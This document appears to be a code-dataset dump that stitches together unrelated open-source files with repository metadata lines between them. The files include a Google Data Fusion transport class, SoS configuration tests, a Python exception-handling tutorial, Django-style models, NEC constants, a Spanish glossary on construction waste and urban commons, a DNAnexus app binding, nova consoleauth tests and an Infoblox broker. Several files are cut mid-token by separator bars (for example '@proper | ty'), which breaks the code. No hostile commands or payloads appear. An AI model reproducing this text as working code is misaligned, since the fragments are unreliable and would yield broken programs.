# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import pkg_resources
import google.auth # type: ignore
import google.api_core
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.api_core import operations_v1
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.data_fusion_v1.types import datafusion
from google.longrunning import operations_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-data-fusion",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class DataFusionTransport(abc.ABC):
"""Abstract transport class for DataFusion."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
DEFAULT_HOST: str = "datafusion.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = {"scopes": scopes, "default_scopes": self.AUTH_SCOPES}
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials are service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.list_available_versions: gapic_v1.method.wrap_method(
self.list_available_versions,
default_timeout=None,
client_info=client_info,
),
self.list_instances: gapic_v1.method.wrap_method(
self.list_instances, default_timeout=None, client_info=client_info,
),
self.get_instance: gapic_v1.method.wrap_method(
self.get_instance, default_timeout=None, client_info=client_info,
),
self.create_instance: gapic_v1.method.wrap_method(
self.create_instance, default_timeout=None, client_info=client_info,
),
self.delete_instance: gapic_v1.method.wrap_method(
self.delete_instance, default_timeout=None, client_info=client_info,
),
self.update_instance: gapic_v1.method.wrap_method(
self.update_instance, default_timeout=None, client_info=client_info,
),
self.restart_instance: gapic_v1.method.wrap_method(
self.restart_instance, default_timeout=None, client_info=client_info,
),
}
def close(self):
"""Closes resources associated with the transport.
.. warning::
Only call this method if the transport is NOT shared
with other clients - this may cause errors in other clients!
"""
raise NotImplementedError()
@property
def operations_client(self):
"""Return the client designed to process long-running o
|
perations."""
raise NotImplementedError()
@proper
|
ty
def list_available_versions(
self,
) -> Callable[
[datafusion.ListAvailableVersionsRequest],
Union[
datafusion.ListAvailableVersionsResponse,
Awaitable[datafusion.ListAvailableVersionsResponse],
],
]:
raise NotImplementedError()
@property
def list_instances(
self,
) -> Callable[
[datafusion.ListInstancesRequest],
Union[
datafusion.ListInstancesResponse,
Awaitable[datafusion.ListInstancesResponse],
],
]:
raise NotImplementedError()
@property
def get_instance(
self,
) -> Callable[
[datafusion.GetInstanceRequest],
Union[datafusion.Instance, Awaitable[datafusion.Instance]],
]:
raise NotImplementedError()
@property
def create_instance(
self,
) -> Callable[
[datafusion.CreateInstanceRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
@property
def delete_instance(
self,
) -> Callable[
[datafusion.DeleteInstanceRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
@property
def update_instance(
self,
) -> Callable[
[datafusion.UpdateInstanceRequest],
Union[operations_pb2.Operation, Awaitable[operati
|
BoPeng/SOS
|
test/test_config.py
|
Python
|
gpl-3.0
| 5,574
| 0
|
#!/usr/bin/env python3
#
# Copyright (c) Bo Peng and the University of Texas MD Anderson Cancer Center
# Distributed under the terms of the 3-clause BSD License.
import os
import getpass
import subprocess
import pytest
from sos import execute_workflow
from sos._version import __version__
from sos.utils import env, load_config_files
from sos.eval import get_config
# if the test is imported under sos/test, test interacive executor
test_cfg = '''
cut: 0.5
cut1:
- 0.5
- 2
- 3
cut2: a3
cut3:
- a
- b
- c
cut4:
A: 123
me: '{user_name}@my'
'''
def test_command_line():
'''Test command line arguments'''
assert subprocess.call(
'sos config -h',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config -g --get',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config --get',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config -g --set a 5',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config --get a',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config -g --unset a',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
def test_config_set(config_factory):
'''Test interpolation of config'''
myconfig = config_factory(test_cfg)
assert subprocess.call(
f'sos config --set cut 0.5 -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut'] == 0.5
#
assert subprocess.call(
f
|
'sos config --set cut1 0.5 2 3 -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=Tr
|
ue) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut1'] == [0.5, 2, 3]
#
assert subprocess.call(
f'sos config --set cut2 a3 -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut2'] == 'a3'
#
assert subprocess.call(
f'sos config --set cut3 a b c -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut3'] == ['a', 'b', 'c']
#
assert subprocess.call(
f'''sos config --set cut4 "{{'A': 123}}" -c {myconfig}''',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut4'] == {'A': 123}
def test_interpolate(config_factory):
'''Test interpolation of config'''
myconfig = config_factory(test_cfg)
assert subprocess.call(
f'''sos config --set me '{{user_name}}@my' -c {myconfig}''',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig, default_config_files=False)
assert get_config('me') == f'{getpass.getuser().lower()}@my'
def test_global_vars(config_factory):
'''Test SoS defined variables'''
execute_workflow("[0]", options={'mode': 'dryrun'})
assert env.sos_dict['SOS_VERSION'] == __version__
assert isinstance(env.sos_dict['CONFIG'], dict)
cfg = config_factory({'my_config': 5})
execute_workflow("[0]", options={'config_file': cfg})
assert env.sos_dict['CONFIG']['my_config'] == 5
def test_get_config(config_factory):
myconfig = config_factory({
'val': 5,
'A': {
'B.C': '33',
'B.C1': {
'D': '34'
},
'D': '45'
},
'E': {
'F': {
'val': 6,
'val1': 10,
'G': '{val + val1}'
},
'H': '{val}'
},
'O': 'A{nonexisting}',
'X': '{os.environ.get("HOME", "no_home")}'
})
load_config_files(myconfig)
assert get_config('A', 'D') == '45'
assert get_config('A.D') == '45'
assert get_config(['A', 'D']) == '45'
assert get_config(['A', 'D']) == '45'
assert get_config('A.B.C') == '33'
assert get_config('A.B.C1.D') == '34'
assert get_config('A') == {'B.C': '33', 'B.C1': {'D': '34'}, 'D': '45'}
assert get_config('E.F') == {'val': 6, 'val1': 10, 'G': '16'}
assert get_config('E.F', val=7) == {'val': 6, 'val1': 10, 'G': '17'}
assert get_config('E.F', val=7, allowed_keys=['G']) == {'G': '17'}
assert get_config(
'E.F', val=7, val1=20) == {
'val': 6,
'val1': 10,
'G': '27'
}
assert get_config('E.F', {
'val': 8,
'val1': 30
}) == {
'val': 6,
'val1': 10,
'G': '38'
}
assert get_config('E.H', val=7) == '7'
with pytest.raises(ValueError):
get_config('O')
assert get_config('O', nonexisting=7) == 'A7'
assert get_config('X') == os.environ.get("HOME", "no_home")
|
hackerpals/Python-Tutorials
|
Python-Intro-Workshops/Exceptions-handling/try.py
|
Python
|
gpl-3.0
| 890
| 0.001124
|
#!/usr/bin/python3
'''
TRY Exception
SYNTAX
----------
|
-------------------------------------------------------
try:
You do your operations here;
......................
except ExceptionI:
If there is ExceptionI, then execute this block.
except ExceptionII:
If there is ExceptionII, then execute this block.
......................
else:
If there is no exception then execute this block.
'''
# try:
# fh = open("testfile","w")
# fh.write("This is my test file for ex
|
ception handling!!")
# except IOError:
# print("Error: can\'t find file or read data")
# else:
# print("Written content in the file successfully")
# fh.close()
try:
fh = open("testfile","r")
fh.write("This is my test file for exception handling!!")
except IOError:
print("Error: cant\'t find file or read data")
else:
print("Written content in the file successfully")
|
mrmuxl/keops
|
keops/modules/project/models.py
|
Python
|
agpl-3.0
| 832
| 0
|
from django.ut
|
ils.translation import ugettext_lazy as _
from keops.db import models
STATUS = (
('draft', _('Draft')),
('open', _('In Progress')),
('pending', _('Pending')),
('don
|
e', _('Done')),
('cancelled', _('Cancelled'))
)
class Category(models.Model):
name = models.CharField(null=False, unique=True)
class TaskType(models.Model):
name = models.CharField(unique=True, null=False)
description = models.TextField()
status = models.CharField(max_length=16, choices=STATUS)
class Meta:
db_table = 'project_task_type'
class Project(models.Model):
manager = models.ForeignKey('base.User')
class Task(models.Model):
name = models.CharField(max_length=128, db_index=True)
description = models.TextField()
status = models.CharField(max_length=16, choices=STATUS)
|
openstack/networking-nec
|
networking_nec/nwa/common/constants.py
|
Python
|
apache-2.0
| 877
| 0
|
# Copyright 2015-2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND
|
, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
NWA_DEVICE_GDV = "GeneralDev"
NWA_DEVICE_TFW = "TenantFW"
NWA_AGENT_TOPIC = 'nwa_agent'
NWA_AGENT_TYPE = 'NEC
|
NWA Agent'
NWA_FIREWALL_PLUGIN = 'NECNWAFWaaS'
# an incremental size if the remaining size is zero.
NWA_GREENPOOL_ADD_SIZE = 32
|
Ale-/grrr.tools
|
apps/views/glossary.py
|
Python
|
gpl-3.0
| 9,637
| 0.010611
|
from django.utils.translation import ugettext_lazy as _
def get():
""" Site glossary. """
return {
'construction' : [
{
'term' : _('Bienes'),
'text' : _('Objetos o cosas susceptibles de apropiación (art. 333 CC). Los bienes son de domino público o de propiedad privada (art. 338 CC).'),
},
{
'term' : _('Cesión'),
'text' : _('Renuncia de una posesión, acción o derecho a favor de otra persona. (art. 460.2 CC)'),
},
{
'term' : _('Código LER'),
'text' : _('Códigos de clasificación de residuos que utiliza la Unión Europea en la elaboración de la lista europea de residuos publicada en el BOE No 43, de 19 de Febrero de 2002 y corregida en el BOE 61, de 12 de marzo del 2002.'),
},
{
'term' : _('Derribo'),
'text' : _('Destrucción deliberada de elementos verticales, muros o edificios.'),
},
{
'term' : _('Desconstrucción'),
'text' : _('Proceso que contiene los siguientes subprocesos: descontaminación, desmontaje, demolición, valorización en la obra, reciclaje de RCD.'),
},
{
'term' : _('Demolición'),
'text' : _('Eliminar de manera controlada una estructura o una parte de esta. Es la combinación de derribo y desmontaje controlado con el fin de eliminar un edificio o parte de este. A diferencia del derribo, la demolición es Segura, Controlada, Selectiva y Precisa.'),
},
{
'term' : _('Descontaminación'),
'text' : _('Eliminación del edificio a demoler la sustancia o sustancias que contaminan o pueden contaminar el medio.'),
},
{
'term' : _('Desmontaje'),
'text' : _('Operación de separar las partes o las piezas, que forman un todo.'),
},
{
'term' : _('Entidades locales'),
'text' : _('Son Entidades Locales o Administraciones públicas de carácter territorial local: El Municipio, la Provincia y la Isla (en los archipiélagos balear y canario), (art. 1.2 LBRL).'),
},
{
'term' : _('Entidad privada sin ánimo de lucro'),
'text' : _('Entidad cuyo fin no es la consecución de un beneficio económico. Suelen tener la figura jurídica de asociación, fundación, mutualidad o cooperativa (las cooperativas pueden tener o carecer de ánimo de lucro), y donde el eventual excedente de su actividad se reinvierte en los fines que tiene por objeto en sus estatutos.'),
},
{
'term' : _('Municipio'),
'text' : _('Entidad local básica de la organización territorial del estado y cauce inmediato de participación ciudadana en los asuntos públicos, que institucionaliza y gestiona con autonomía los intereses propios de las correspondi
|
entes colectividades (art. 1.1 LBRL).'),
},
{
'term' : _('Oneroso'),
'text' : _('No gratuito, que exige alguna contraprestación.'),
},
{
'term' : _('Valorización'),
'text' : _('Proceso para volver a hacer útil un residuo o un componente de un residuo.'),
},
{
'term' : _('RCD'),
'text' : _('Res
|
iduo producto de una construcción o demolición.'),
},
{
'term' : _('Reutilizar'),
'text' : _('Emplear de manera útil un material simple o compuesto, utilizado anteriormente, con posibilidades de cambiar su uso, sus características o su ubicación.'),
},
{
'term' : _('Reciclar'),
'text' : _('Procesar un material para ser reutilizado, no necesariamente en su forma original.'),
},
{
'term' : _('Recurso'),
'text' : _('Conjunto de elementos disponibles para resolver una necesidad.'),
},
{
'term' : _('Residuo'),
'text' : _('Aquéllo que resta de un todo después de sustraer una o más partes. Aquello que resulta de la descomposición o destrucción de algo.'),
},
{
'term' : _('Residuo primario'),
'text' : _('Residuo antes de estudiar las posibilidades que ofrece de tratamiento para dejar de ser un residuo.'),
},
{
'term' : _('Subproducto'),
'text' : _('Residuos que se pueden utilizar directamente como primeras materias otras producciones o como sustituto de productos comerciales y que son recuperables sin necesidad de someterlos a operaciones de tratamiento.'),
},
],
'commons' : [
{
'term' : _('Bienes comunes urbanos'),
'text' : _('aquellos bienes materiales, inmateriales y/o digitales, que los Ciudadanos y la Administración, incluidos aquellos realizados a través de procedimientos participativos y deliberativos, reconocen como funcionales para el bienestar individual y colectivo.'),
},
{
'term' : _('Ciudadanos activos'),
'text' : _('Todos los sujetos, individuos, asociaciones o cualquier otro colectivo, también en forma de negocio u organización social, que actúen en favor del cuidado y regeneración de los bienes comunes urbanos.'),
},
{
'term' : _('Propuesta de colaboración'),
'text' : _('La manifestación de interés, formulada por los ciudadanos activos, cuya finalidad es la intervención de cuidado y regeneración de los bienes comunes urbanos. La propuesta puede ser espontánea o en respuesta a una solicitud formulada por el Ayuntamiento.'),
},
{
'term' : _('Acuerdo de colaboración'),
'text' : _('El pacto a través del cual el Ayuntamiento o la entidad privada y los ciudadanos activos definen el alcance de las intervenciones de cuidado y regeneración de los bienes comunes urbanos.'),
},
{
'term' : _('Intervenciones de cuidado'),
'text' : _('Intervenciones orientadas a la protección, conservación y mantenimiento de los bienes comunes urbanos para garantizar y mejorar su facilidad de uso y calidad.os, reconocen como funcionales para el bienestar individual y colectivo.'),
},
{
'term' : _('Gestión compartida'),
'text' : _('Aquellas intervenciones de cuidado de bienes comunes urbanos realizadas conjuntamente por los Ciudadanos y la Administración con carácter de continuidad e inclusión.'),
},
{
'term' : _('Intervenciones de regeneración'),
'text' : _('Trabajos de restauración, transformación e innovación de los bienes comunes, realizados a través de métodos de co-diseño e integrados con procesos sociales, económicos, tecnológicos y ambientales, que en su conjunto tienen un impacto en la mejora de la calidad de vida del ciudadano.'),
},
{
'term' : _('Espacios públicos'),
'text' : _('Zonas verdes, plazas, calles, aceras y otros espacios públicos o abiertos al público, de propiedad o de uso público.'),
},
{
'term' : _('Confianza mutua'),
'text' : _('Sin perjuicio de las prerrogativas de supervisión pública, planificación y verificación, la Administración y los ciudadanos activos abordarán su relación desde la confianza mutua y asumiendo que la respectiva cooperación voluntaria se orienta a la consecución de fines de interés general.'),
},
{
'term' : _('Publicidad y transparencia'),
'text' : _('La administración garantizará la máxima difusión de oportunidades de colaboración, propuestas recibidas, ayudas conce
|
johnwallace123/dx-toolkit
|
src/python/dxpy/bindings/dxapp.py
|
Python
|
apache-2.0
| 15,467
| 0.002069
|
# Copyright (C) 2013-2016 DNAnexus, Inc.
#
# This file is part of dx-toolkit (DNAnexus platform client libraries).
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
DXApp Handler
+++++++++++++
Apps allow for application logic to be distributed to users in the
system, and they allow for analyses to be run in a reproducible and
composable way.
Apps extend the functionality of applets to require input/output
specifications as well as to allow for versioning, collaborative
development, and policies for billing and data access. Similarly to
applets, apps can be run by calling their
:meth:`~dxpy.bindings.dxapp.DXApp.run` method.
Unlike applets, apps are not data objects and do not live in projects.
Instead, they share a single global namespace. An app may have multiple
different versions (e.g. "1.0.0", "1.0.1", etc.) associated with a
single name (which is of the form "app-APPNAME"). A particular version
of an app may be identified in two ways, either by specifying a
combination of its name and a version (or a *tag*), or by specifying its
unique identifier.
Each app has a list of developers, which are the users that are
authorized to publish new versions of an app; perform administrative
tasks, such as assigning categories, and attaching new tags to versions
of the app; and add or remove other developers. When the first version
of an app with a given name is created, the creating user initially
becomes the sole developer of the app.
"""
from __future__ import print_function, unicode_literals, division, absolute_import
import dxpy
from . import DXObject, DXExecutable, DXJob, verify_string_dxid
from ..exceptions import DXError
from ..compat import basestring
#########
# DXApp #
#########
_app_required_keys = ['name', 'title', 'summary', 'dxapi', 'openSource',
'version', 'inputSpec', 'outputSpec', 'runSpec',
'developers', 'authorizedUsers']
# These are optional keys for apps, not sure what to do with them
_app_optional_keys = ['description', 'developerNotes', 'details',
'categories', 'resources', 'access']
_app_describe_output_keys = []
_app_cleanup_keys = ['name', 'title', 'summary', 'dxapi', 'openSource',
'version', 'runSpec', 'developers', 'authorizedUsers']
class DXApp(DXObject, DXExecutable):
'''
Remote app object handler.
'''
_class = "app"
def __init__(self, dxid=None, name=None, alias=None):
DXObject.__init__(self)
if dxid is not None or name is not None:
self.set_id(dxid=dxid, name=name, alias=alias)
def set_id(self, dxid=None, name=None, alias=None):
'''
:param dxid: App ID
:type dxid: string
:param name: App name
:type name: string
:param alias: App version or tag
:type alias: string
:raises: :exc:`~dxpy.exceptions.DXError` if *dxid* and some other input are both given or if neither *dxid* nor *name* are given
Discards the currently stored ID and associates the handler
with the requested parameters. Note that if *dxid* is given,
the other fields should not be given, and if *name* is given,
*alias* has default value "default".
'''
self._dxid = None
self._name = None
self._alias = None
if dxid is not None:
if name is not None or alias is not None:
raise DXError("Did not expect name or alias to be given if dxid is given")
verify_string_dxid(dxid, self._class)
self._dxid = dxid
elif name is not None:
self._name = name
if not isinstance(name, basestring):
raise DXError("App name needs to be a string: %r" % (name,))
if alias is not None:
if not isinstance(alias, basestring):
raise DXError("App alias needs to be a string: %r" % (alias,))
self._alias = alias
else:
self._alias = 'default'
def get_id(self):
'''
:returns: Object ID of associated app
:rtype: string
Returns the object ID of the app that the handler is currently
associated with.
'''
if self._dxid is not None:
return self._dxid
else:
return 'app-' + self._name + '/' + self._alias
def new(self, **kwargs):
'''
:param initializeFrom: ID of an existing app object from which to initialize the app
:type initializeFrom: string
:param applet: ID of the applet that the app will be created from
:type applet: string
:param name: Name of the app (inherits from *initializeFrom* if possible)
:type name: string
:param title: Title or brand name of the app (optional)
:type title: string
:param summary: A short description of the app (optional)
:type summary: string
:param description: An extended description of the app (optional)
:type description: string
:param details: Arbitrary JSON to be associated with the app (optional)
:type details: dict or list
:param version: Version number
:type version: string
:param bill_to: ID of the user or organization who will own the app and be billed for its space usage (optional if a
|
n app with this name already exists)
:type bill_to: string
:param access: Access specification (optional)
:type access: dict
:param resources: Specifies what is to be p
|
ut into the app's resources container. Must be a string containing a project ID, or a list containing object IDs. (optional)
:type resources: string or list
.. note:: It is highly recommended that the higher-level module
:mod:`dxpy.app_builder` or (preferably) its frontend `dx build --create-app
<https://wiki.dnanexus.com/Command-Line-Client/Index-of-dx-Commands#build>`_
be used instead for app creation.
Creates an app with the given parameters by using the specified
applet or app as a base and overriding its attributes. See the
API documentation for the `/app/new
<https://wiki.dnanexus.com/API-Specification-v1.0.0/Apps#API-method%3A-%2Fapp%2Fnew>`_
method for more info.
Exactly one of *initializeFrom* and *applet* must be provided.
The app is only available to its developers until
:meth:`publish()` is called, and is not run until :meth:`run()`
is called.
'''
dx_hash = {}
if 'applet' not in kwargs and 'initializeFrom' not in kwargs:
raise DXError("%s: One of the keyword arguments %s and %s is required" % (self.__class__.__name__, 'applet', 'initializeFrom'))
for field in ['version']:
if field not in kwargs:
raise DXError("%s: Keyword argument %s is required" % (self.__class__.__name__, field))
dx_hash[field] = kwargs[field]
del kwargs[field]
for field in 'initializeFrom', 'applet', 'name', 'title', 'summary', 'description', 'billing', 'access', 'resources':
if field in kwargs:
dx_hash[field] = kwargs[field]
del kwargs[field]
if "bill_to" in kwargs:
dx_hash['billTo'] = kwargs['bill_to']
del kwargs["bill_to"]
resp = dxpy.api.app_new(dx_hash, **kwargs)
self.set_id(dxid=resp["id"])
def describe(self, fields=None, **kwargs):
'''
:param fields: Hash where the keys are field names that should be returned, and values s
|
ntt-sic/nova
|
nova/tests/consoleauth/test_consoleauth.py
|
Python
|
apache-2.0
| 7,413
| 0.001349
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for Consoleauth Code.
"""
import mox
from nova.consoleauth import manager
from nova import context
from nova import db
from nova.openstack.common import timeutils
from nova import test
class ConsoleauthTestCase(test.TestCase):
"""Test Case for consoleauth."""
def setUp(self):
super(ConsoleauthTestCase, self).setUp()
self.manager = manager.ConsoleAuthManager()
self.context = context.get_admin_context()
self.instance = db.instance_create(self.context, {})
def test_tokens_expire(self):
# Test that tokens expire correctly.
self.useFixture(test.TimeOverride())
token = u'mytok'
self.flags(console_token_ttl=1)
self._stub_validate_console_port(True)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
self.assertTrue(self.manager.check_token(self.context, token))
timeutils.advance_time_seconds(1)
self.assertFalse(self.manager.check_token(self.context, token))
def _stub_validate_console_port(self, result):
def fake_validate_console_port(ctxt, instance, port, console_type):
return result
self.stubs.Set(self.manager.compute_rpcapi,
'validate_console_port',
fake_validate_console_port)
def test_multiple_tokens_for_instance(self):
tokens = [u"token" + str(i) for i in xrange(10)]
self._stub_validate_console_port(True)
for token in tokens:
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
for token in tokens:
self.assertTrue(self.manager.check_token(self.context, token))
def test_delete_tokens_for_instance(self):
tokens = [u"token" + str(i) for i in xrange(10)]
for token in tokens:
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
self.manager.delete_tokens_for_instance(self.context,
self.instance['uuid'])
stored_tokens = self.manager._get_tokens_for_instance(
self.instance['uuid'])
self.assertEqual(len(stored_tokens), 0)
for token in tokens:
self.assertFalse(self.manager.check_token(self.context, token))
def test_wrong_token_has_port(self):
token = u'mytok'
self._stub_validate_console_port(False)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
instance_uuid=self.instance['uuid'])
self.assertFalse(self.manager.check_token(self.context, token))
def test_console_no_instance_uuid(self):
self.manager.authorize_console(self.context, u"token", 'novnc',
'127.0.0.1', '8080', 'host',
instance_uuid=None)
self.assertFalse(self.manager.check_token(self.context, u"token"))
def test_delete_expired_tokens(self):
self.useFixture(test.TimeOverride())
token = u'mytok'
self.flags(console_token_ttl=1)
self._stub_validate_console_port(True)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
timeutils.advance_time_seconds(1)
self.assertFalse(self.manager.check_token(self.context, token))
token1 = u'mytok2'
self.manager.authorize_console(self.context, token1, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
stored_tokens = self.manager._get_tokens_for_instance(
self.instance['uuid'])
# when trying to store token1, expired token is removed fist.
self.assertEqual(len(stored_tokens), 1)
self.assertEqual(stored_tokens[0], token1)
class ControlauthMemcacheEncodingTestCase(test.TestCase):
def setUp(self):
super(ControlauthMemcacheEncodingTestCase, self).setUp()
self.manager = manager.ConsoleAuthManager()
self.context = context.get_admin_context()
self.u_token = u"token"
self.u_instance = u"instance"
def test_authorize_console_encoding(self):
self.mox.StubOutWithMock(self.manager.mc, "set")
self.mox.StubOutWithMock(self.manager.mc, "get")
self.manager.mc.set(mox.IsA(str), mox.IgnoreArg(), mox.IgnoreArg()
).AndReturn(True)
self.manager.mc.get(mox.IsA(str)).AndReturn(None)
self.manager.mc.set(mox.IsA(str), mox.IgnoreArg()).AndReturn(True)
self.mox.ReplayAll()
self.manager.authorize_console(self.context, self.u_token, 'novnc',
'127.0.0.1', '8080', 'host',
self.u_instance)
def test_check_token_encoding(self):
self.mox.StubOutWithMock(self.manager.mc, "get")
self.manager.mc.get(mox.IsA(str)).AndReturn(None)
self.mox.ReplayAll()
self.manager.check_token(self.context, self.u_token)
def test_delete_tokens_for_instance_encoding(self):
self.mox.StubOutWithMock(self.manager.mc, "delete")
self.mox.StubOutWithMock(self.manager.mc, "get")
self.manager.mc.get(mox.IsA(str)).AndReturn('["token"]')
self.manager.mc.delete(mox.IsA(str)).AndReturn(True)
self.manager.mc.delete(mox.IsA(str)).AndReturn(True)
self.mox.ReplayAll()
self.manager.delete_tokens_for_instance(self.co
|
ntext, self.u_instance)
class CellsConsoleauthTestCase(ConsoleauthTestCase):
"""Test Case for consoleauth w/ cells enabled."""
def setUp(self):
super(CellsConsoleauthTestCase, self).setUp()
self.flags(enable=True, group='cells')
def _stub_validate_console_port(self, result):
def fake_validate_console_port(ctxt, instance_uuid, console_port,
console_type):
return result
self.stubs.Set(self.manager.
|
cells_rpcapi,
'validate_console_port',
fake_validate_console_port)
|
infobloxopen/infoblox-netmri
|
infoblox_netmri/api/broker/v3_8_0/issue_detail_broker.py
|
Python
|
apache-2.0
| 78,423
| 0.002193
|
from ..broker import Broker
class IssueDetailBroker(Broker):
controller = "issue_details"
def show(self, **kwargs):
"""Shows the details for the specified issue detail.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IssueID: The internal NetMRI identifier for this issue instance.
:type IssueID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of issue detail methods. The listed methods will be called on each issue detail returned and included in the output. Available methods are: data_source, device, interface, iprg, vlan, subnet, alternate_device, issue_desc, title, severity, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, iprg, vlan, subnet, alternate_device, issue_desc.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return issue_detail: The issue detail identified by the specified IssueID.
:rtype issue_detail: IssueDetail
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
